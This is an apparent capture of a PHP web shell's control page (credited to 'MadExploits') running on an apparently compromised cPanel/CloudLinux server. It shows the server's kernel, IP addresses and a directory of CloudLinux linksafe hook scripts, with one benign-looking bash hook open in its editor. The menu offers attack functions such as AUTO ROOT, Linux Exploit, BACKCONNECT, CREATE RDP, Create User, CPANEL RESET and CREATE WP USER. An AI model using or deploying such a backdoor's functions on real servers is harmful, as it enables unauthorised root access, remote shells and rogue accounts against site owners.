Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.219.239.111
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cloudlinux-linksafe /
cpanel /
hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
cloudlinux_linksafe_hook.sh
162
B
-rwxr-xr-x
cpanel-linksafe-delete-hooks
851
B
-rwxr-xr-x
cpanel-linksafe-install-hooks
2.15
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpanel-linksafe-delete-hooks
#!/bin/bash function deleteAllInclude(){ hook_file="$1" tmp_name="$2" pattern="$3" common_path="$4" if [ ! -e "${common_path}/tmp" ]; then mkdir -p "${common_path}/tmp" fi if [ -e "${hook_file}" ];then cat "${hook_file}" | sed "${pattern}" > "${common_path}/tmp/${tmp_name}.tmp.$$" cat "${common_path}/tmp/${tmp_name}.tmp.$$" > "${hook_file}" rm -f "${common_path}/tmp/${tmp_name}.tmp.$$" fi } if [ ! -e "/usr/local/cpanel/cpanel" ]; then exit 0 fi if [ ! -e "/proc/sys/fs/protected_symlinks_allow_gid" ]; then exit 0 fi POSTUPCP="/scripts/postupcp" TARGET="cloudlinux-linksafe" COMMON_PATH="/usr/share/${TARGET}/cpanel/hooks" deleteAllInclude "${POSTUPCP}" "postupcp" "/#${TARGET}/d" "${COMMON_PATH}" chown -h :root /usr/local/cpanel/base/frontend/paper_lantern/styled/*
Close